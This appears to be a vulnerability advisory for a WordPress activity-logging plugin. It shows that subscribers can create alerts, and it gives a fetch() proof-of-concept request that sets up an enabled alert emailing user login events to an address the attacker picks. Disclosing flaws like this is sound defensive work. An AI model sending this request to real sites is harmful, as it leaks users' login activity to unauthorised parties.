The plugin does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.
Step 1: Log in as a subscriber
Step 2: Get a nonce from https://example.com/wp-admin/admin-ajax.php?action=get_new_alert_triggers_notifications
Step 3: Configure the alerts via:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},"method":"POST",
"body": "action=save_new_alert&wp_stream_alerts_nonce=XXXX&wp_stream_trigger_author=&wp_stream_trigger_context=users-sessions&wp_stream_trigger_action=login&wp_stream_alert_type=email&wp_stream_alert_status=wp_stream_enabled&wp_stream_email_recipient=recipient%40example.com&wp_stream_email_subject=test",
});